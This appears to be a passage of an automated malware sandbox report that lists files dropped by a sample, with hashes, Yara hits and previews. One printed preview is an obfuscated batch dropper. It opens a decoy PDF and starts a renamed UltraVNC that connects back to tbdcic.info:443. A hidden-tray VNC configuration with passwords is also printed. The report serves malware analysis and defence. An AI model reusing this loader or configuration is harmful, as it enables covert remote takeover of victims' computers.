                                                                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-23 07-37-38-663.log

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:ASCII text, with very long lines (393)
                                                                    Category:dropped
                                                                    Size (bytes):16525
                                                                    Entropy (8bit):5.386483451061953
                                                                    Encrypted:false
                                                                    SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                                    MD5:F49CA270724D610D1589E217EA78D6D1
                                                                    SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                                    SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                                    SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                                    Malicious:false
                                                                    Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):15114
                                                                    Entropy (8bit):5.3656857403041025
                                                                    Encrypted:false
                                                                    SSDEEP:384:Qu03cqZLSxsXACgJdDANJSHPEXNmKrPdzYs46GaLJ43U/tknZ4AvZ0ZYtS8C+Dbq:4vr
                                                                    MD5:0B3E96BDBCDA60F4C71D40D8448C1364
                                                                    SHA1:8EA062A4E16F840D4D672F5A72DF90AF977E299F
                                                                    SHA-256:D56BFA178F31352BC253C94F2B58C0DD25130AADA20BE7967247F370C311819A
                                                                    SHA-512:E5F884ABDC2BDFCF9B6270A96FA57609F7314C11FCDD22C8F1D8D47801B5A8372219AD03FE5BE3C88BBFBDC5C684EF249FA36AE5DD8C0D8BB1C4A77322EFAA48
                                                                    Malicious:false
                                                                    Preview:SessionID=a03fced1-c45f-4d29-8544-b0409d88d524.1734957458687 Timestamp=2024-12-23T07:37:38:687-0500 ThreadID=7320 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=a03fced1-c45f-4d29-8544-b0409d88d524.1734957458687 Timestamp=2024-12-23T07:37:38:688-0500 ThreadID=7320 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=a03fced1-c45f-4d29-8544-b0409d88d524.1734957458687 Timestamp=2024-12-23T07:37:38:688-0500 ThreadID=7320 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=a03fced1-c45f-4d29-8544-b0409d88d524.1734957458687 Timestamp=2024-12-23T07:37:38:688-0500 ThreadID=7320 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=a03fced1-c45f-4d29-8544-b0409d88d524.1734957458687 Timestamp=2024-12-23T07:37:38:688-0500 ThreadID=7320 Component=ngl-lib_NglAppLib Description="SetConf

                                                                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):35721
                                                                    Entropy (8bit):5.415378283324518
                                                                    Encrypted:false
                                                                    SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRL:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRJ
                                                                    MD5:67FCDFFFE4E9113ABEE902CA14FDB015
                                                                    SHA1:49F41DAF13DCFF7FE8711A7B9B94BC1BD3992162
                                                                    SHA-256:090AAA7CBF5CCE2C4464B8816BA974AD10DD3C36C86FA6EDFC202E7EFE62D5D0
                                                                    SHA-512:7EF4F24FA54AD11CDBB4478E7CCF69C48947295CB25632A57225757E9393B453FF37850699368140A7E5C15062859A1AB80E89A11154A201F9F1687DF119B1D8
                                                                    Malicious:false
                                                                    Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-

                                                                    C:\Users\user\AppData\Local\Temp\acrocef_low\491af29d-46ae-47f3-9f93-26e877423632.tmp

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                                    Category:dropped
                                                                    Size (bytes):1407294
                                                                    Entropy (8bit):7.97605879016224
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/yowYIGNP4bdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oBGZd:twZG6b3mlind9i4ufFXpAXkrfUs0qWLa
                                                                    MD5:8D04FDC5022E491B91EC6B32F003430B
                                                                    SHA1:6619D46E06076B5669D4CC677D6D8F638189E46A
                                                                    SHA-256:7682C53053D66EF0B1A89335C88C4420226B10AFAC87A286E6E1A6BC795FEE61
                                                                    SHA-512:AA96FA56D3C5C4200BAA917D3091ADB1A5FAE7D534DD9C909D8B60AE13E902D6B71D42C2823319483414987E4B41079FA241B3D0A384EE4B281B63F834917E7D
                                                                    Malicious:false
                                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                    C:\Users\user\AppData\Local\Temp\acrocef_low\a54c75d0-858c-4c41-970e-84015b6c826a.tmp

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                    Category:dropped
                                                                    Size (bytes):386528
                                                                    Entropy (8bit):7.9736851559892425
                                                                    Encrypted:false
                                                                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                    Malicious:false
                                                                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                    C:\Users\user\AppData\Local\Temp\acrocef_low\c87616c2-e185-4322-ab3e-834045ef6079.tmp

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                    Category:dropped
                                                                    Size (bytes):758601
                                                                    Entropy (8bit):7.98639316555857
                                                                    Encrypted:false
                                                                    SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                    MD5:3A49135134665364308390AC398006F1
                                                                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                    Malicious:false
                                                                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                    C:\Users\user\AppData\Local\Temp\acrocef_low\d2ecfc73-7689-472c-9022-64de92156dcc.tmp

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                    Category:dropped
                                                                    Size (bytes):1419751
                                                                    Entropy (8bit):7.976496077007677
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/pwYIGNPQxW/07oXGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:xwZG2xW/xXGZn3mlind9i4ufFXpAXkru
                                                                    MD5:64519B3A50204131E7CD6FFCD844ACD7
                                                                    SHA1:197EFD8661422562DD58600674F275EAE39E348C
                                                                    SHA-256:C2FDD4384B808A99B2F0D3DDDF227795FC3EEE937DD30A2C1D41DC8E5449031E
                                                                    SHA-512:33B7A0B69494553B57F537ED1E49A24280290ACB8A9703D615A1D182BA64CF02D67AF0A48BBA664CA4315B515A1AF63A9E92FB02D1BFB0648CF147F1EBD9EA4B
                                                                    Malicious:false
                                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                    C:\Users\user\Downloads\Lom.pdf

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                    Category:dropped
                                                                    Size (bytes):605114
                                                                    Entropy (8bit):7.931189302613814
                                                                    Encrypted:false
                                                                    SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                    MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                    SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                    SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                    SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                    Malicious:false
                                                                    Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

                                                                    C:\Windows\Tasks\5482310161066753

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:DOS batch file, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1063
                                                                    Entropy (8bit):5.5415018235723945
                                                                    Encrypted:false
                                                                    SSDEEP:24:gDo8Dlr0RMqL0LtvJW2urcW1SalC/ki2wpx/m:aEb2AhFWx/m
                                                                    MD5:651796E1EB5F2C51A6DD6929A65184DA
                                                                    SHA1:C475C14C2D71453126FBDE6E135C4B68801A0E9F
                                                                    SHA-256:8F0E40CBAAA9C09FA66C18BB90B54FD373EAEF4328E166EB5D0A3EE036F8DD49
                                                                    SHA-512:C76F34CD8F7BC54A2D229B6DE8C0899FD676DB75001BAF0A7394655BE85CCE65539D3B7D1565A2381ADECF851615B9A989C9D83B22B6732BA4272026D9D8454F
                                                                    Malicious:false
                                                                    Preview:@echo off.setlocal enabledelayedexpansion.set dLblEw=nhost.set H9zjF6=nne.set Ely6ya=co.set rsZWbB=exe.set e2uPdm=Lom.set RscJfa=pdf.set DE4CBb=raVNC.set jq2jOU=%COMPUTERNAME%.set q6noQx=autore.set WWfq61=%WINDIR%\Tasks\698563441.cmd.set AMDK6l=tbdcic.info.set qC9Ryl=Thj0Wf.set eUynLD=443.set uTrzGi=co.set ayToqv=ct.set nM9rdS=Ult.set TfRayV=sync_browser.set erudre=ini.timeout /t 1.copy "gTFLK1.jBd3Ei" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%" & start "" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%".timeout /t 1.taskkill /f /im %TfRayV%.%rsZWbB% .timeout /t 2.copy "GIjul8.QTIrrr" "%TfRayV%.%rsZWbB%".timeout /t 1.copy "CEpr8q.li7XUg" "%nM9rdS%%DE4CBb%.%erudre%".timeout /t 2.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% .timeout /t 8.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% -%q6noQx%%Ely6ya%%H9zjF6%%ayToqv% -id:%jq2jOU%_%qC9Ryl% -%Ely6ya%%H9zjF6%%ayToqv% %AMDK6l%:%eUynLD%.timeout /t 2.copy "sdABZ4.E1924R" "%uTrzGi%%dLblEw%.%rsZWbB%".timeout /t 4.:loop.if exist "%WWfq61%" (. cmd /c "%WWfq61%". tim

                                                                    C:\Windows\Tasks\5482310161066753.cmd

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:DOS batch file, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1063
                                                                    Entropy (8bit):5.5415018235723945
                                                                    Encrypted:false
                                                                    SSDEEP:24:gDo8Dlr0RMqL0LtvJW2urcW1SalC/ki2wpx/m:aEb2AhFWx/m
                                                                    MD5:651796E1EB5F2C51A6DD6929A65184DA
                                                                    SHA1:C475C14C2D71453126FBDE6E135C4B68801A0E9F
                                                                    SHA-256:8F0E40CBAAA9C09FA66C18BB90B54FD373EAEF4328E166EB5D0A3EE036F8DD49
                                                                    SHA-512:C76F34CD8F7BC54A2D229B6DE8C0899FD676DB75001BAF0A7394655BE85CCE65539D3B7D1565A2381ADECF851615B9A989C9D83B22B6732BA4272026D9D8454F
                                                                    Malicious:false
                                                                    Preview:@echo off.setlocal enabledelayedexpansion.set dLblEw=nhost.set H9zjF6=nne.set Ely6ya=co.set rsZWbB=exe.set e2uPdm=Lom.set RscJfa=pdf.set DE4CBb=raVNC.set jq2jOU=%COMPUTERNAME%.set q6noQx=autore.set WWfq61=%WINDIR%\Tasks\698563441.cmd.set AMDK6l=tbdcic.info.set qC9Ryl=Thj0Wf.set eUynLD=443.set uTrzGi=co.set ayToqv=ct.set nM9rdS=Ult.set TfRayV=sync_browser.set erudre=ini.timeout /t 1.copy "gTFLK1.jBd3Ei" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%" & start "" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%".timeout /t 1.taskkill /f /im %TfRayV%.%rsZWbB% .timeout /t 2.copy "GIjul8.QTIrrr" "%TfRayV%.%rsZWbB%".timeout /t 1.copy "CEpr8q.li7XUg" "%nM9rdS%%DE4CBb%.%erudre%".timeout /t 2.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% .timeout /t 8.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% -%q6noQx%%Ely6ya%%H9zjF6%%ayToqv% -id:%jq2jOU%_%qC9Ryl% -%Ely6ya%%H9zjF6%%ayToqv% %AMDK6l%:%eUynLD%.timeout /t 2.copy "sdABZ4.E1924R" "%uTrzGi%%dLblEw%.%rsZWbB%".timeout /t 4.:loop.if exist "%WWfq61%" (. cmd /c "%WWfq61%". tim

                                                                    C:\Windows\Tasks\CEpr8q.li7XUg

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:Generic INItialization configuration [admin]
                                                                    Category:dropped
                                                                    Size (bytes):858
                                                                    Entropy (8bit):5.216893826927931
                                                                    Encrypted:false
                                                                    SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                    MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                    SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                    SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                    SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                    Malicious:false
                                                                    Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..

                                                                    C:\Windows\Tasks\GIjul8.QTIrrr

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1945368
                                                                    Entropy (8bit):6.532894678367002
                                                                    Encrypted:false
                                                                    SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                    MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                    SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                    SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                    SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\GIjul8.QTIrrr, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

                                                                    C:\Windows\Tasks\UltraVNC.ini

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:Generic INItialization configuration [admin]
                                                                    Category:dropped
                                                                    Size (bytes):858
                                                                    Entropy (8bit):5.216893826927931
                                                                    Encrypted:false
                                                                    SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                    MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                    SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                    SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                    SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                    Malicious:false
                                                                    Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..

                                                                    C:\Windows\Tasks\conhost.exe

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):867840
                                                                    Entropy (8bit):6.386550733462827
                                                                    Encrypted:false
                                                                    SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                    MD5:0F568F6C821565AB9FF45C7457953789
                                                                    SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                    SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                    SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
